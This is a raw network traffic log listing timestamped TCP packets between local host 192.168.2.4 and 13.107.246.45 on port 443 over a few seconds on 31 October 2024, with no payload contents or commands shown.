Oct 31, 2024 19:20:13.224754095 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.225791931 CET	51310	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.225799084 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.252305984 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.253153086 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.253175020 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.253937006 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.253942966 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.354974985 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.355226994 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.355354071 CET	51310	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.355626106 CET	51310	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.355626106 CET	51310	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.355658054 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.355673075 CET	443	51310	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.359369993 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.359404087 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.359538078 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.359880924 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.359894991 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.386264086 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.386507034 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.386589050 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.386811972 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.386842012 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.386853933 CET	51309	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.386858940 CET	443	51309	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.390435934 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.390470982 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.390594006 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.390844107 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.390852928 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.923399925 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.924029112 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.924041033 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.924740076 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.924746037 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.932435989 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.932887077 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.932914019 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.933489084 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.933495045 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.962285995 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.963053942 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.963093042 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:13.963541031 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:13.963550091 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.053508997 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.053600073 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.053714991 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.054024935 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.054039001 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.054049969 CET	51312	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.054055929 CET	443	51312	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.057662010 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.057693005 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.057828903 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.058046103 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.058063030 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.062427044 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.062884092 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.063004017 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.063035011 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.063049078 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.063060999 CET	51311	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.063066959 CET	443	51311	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.065907001 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.065936089 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.066049099 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.066230059 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.066242933 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.089622021 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.090384960 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.090396881 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.090831995 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.090837955 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.097105980 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.097407103 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.097520113 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.097520113 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.097553015 CET	51313	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.097573996 CET	443	51313	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.100769997 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.100825071 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.100897074 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.101087093 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.101105928 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.158884048 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.160554886 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.160581112 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.161931038 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.161940098 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.219723940 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.219785929 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.219839096 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.254339933 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.254339933 CET	51314	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.254364967 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.254374981 CET	443	51314	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.295375109 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.295478106 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.295543909 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.305249929 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.305278063 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.305326939 CET	51315	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.305332899 CET	443	51315	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.311944962 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.311990976 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.312108040 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.312793970 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.312839985 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.312926054 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.313126087 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.313141108 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.313209057 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.313225985 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.789885044 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.790594101 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.790625095 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.791136026 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.791141987 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.792448044 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.792787075 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.792802095 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.793162107 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.793168068 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.920075893 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.921941996 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.922066927 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.922142029 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.923537016 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.924642086 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.924710035 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.930740118 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.930757999 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.931252003 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.931258917 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.943301916 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.943332911 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.943348885 CET	51316	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.943356037 CET	443	51316	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.943919897 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.943919897 CET	51317	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.943938017 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.943954945 CET	443	51317	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.953632116 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.953686953 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.953762054 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.953913927 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.953928947 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.955029964 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.955096006 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:14.955189943 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.955363989 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:14.955378056 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.046650887 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.049438000 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.049460888 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.049942017 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.049947977 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.057128906 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.057190895 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.057250023 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.057416916 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.057437897 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.057450056 CET	51318	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.057456017 CET	443	51318	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.060417891 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.060466051 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.060525894 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.060739040 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.060750961 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.070362091 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.070883989 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.070904970 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.071387053 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.071396112 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.175956011 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.176529884 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.176584959 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.176917076 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.176937103 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.176948071 CET	51320	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.176959038 CET	443	51320	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.180150032 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.180211067 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.180275917 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.180419922 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.180438995 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.203511953 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.203875065 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.203994989 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.208833933 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.208859921 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.208889008 CET	51319	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.208897114 CET	443	51319	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.223259926 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.223310947 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.223395109 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.223570108 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.223587990 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.693372965 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.693905115 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.694178104 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.694190979 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.694768906 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.694775105 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.695709944 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.695736885 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.696136951 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.696145058 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.809748888 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.810451984 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.810462952 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.810863018 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.810868025 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.823407888 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.823471069 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.823550940 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.823803902 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.823824883 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.823836088 CET	51322	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.823843002 CET	443	51322	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.825154066 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.825216055 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.825272083 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.825402975 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.825402975 CET	51321	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.825419903 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.825429916 CET	443	51321	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.827583075 CET	51327	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.827583075 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.827617884 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.827626944 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.827702045 CET	51327	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.827840090 CET	51327	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.827841043 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.827841043 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.827852011 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.827879906 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.907727003 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.908366919 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.908409119 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.908874035 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.908881903 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.944591045 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.944679976 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.945168018 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.945198059 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.945365906 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.945424080 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.945476055 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.945497036 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.945518970 CET	51323	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.945525885 CET	443	51323	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.945785046 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.945791960 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.948465109 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.948519945 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:15.948601961 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.948724985 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:15.948740005 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.035720110 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.035912037 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.035969973 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.036072016 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.036097050 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.036112070 CET	51324	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.036120892 CET	443	51324	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.039570093 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.039601088 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.039705038 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.039850950 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.039860010 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.075753927 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.075885057 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.075967073 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.076162100 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.076184988 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.076198101 CET	51325	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.076204062 CET	443	51325	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.079282999 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.079329014 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.079394102 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.079550028 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.079564095 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.567018986 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.567692041 CET	51327	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.567712069 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.568402052 CET	51327	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.568408012 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.570836067 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.571248055 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.571279049 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.571707010 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.571712971 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.692257881 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.695185900 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.695216894 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.695869923 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.695875883 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.701412916 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.701486111 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.701560020 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.701736927 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.701736927 CET	51326	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.701756001 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.701767921 CET	443	51326	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.704813957 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.704858065 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.705027103 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.705096006 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.705104113 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.757720947 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.758337975 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.758369923 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.759028912 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.759035110 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.808168888 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.808787107 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.808821917 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.809324980 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.809331894 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.823554039 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.823669910 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.823736906 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.824023008 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.824023008 CET	51328	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.824044943 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.824055910 CET	443	51328	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.826958895 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.827012062 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.827104092 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.827264071 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.827276945 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.859304905 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.859406948 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.859487057 CET	51327	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.859831095 CET	51327	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.859831095 CET	51327	443	192.168.2.4	13.107.246.45
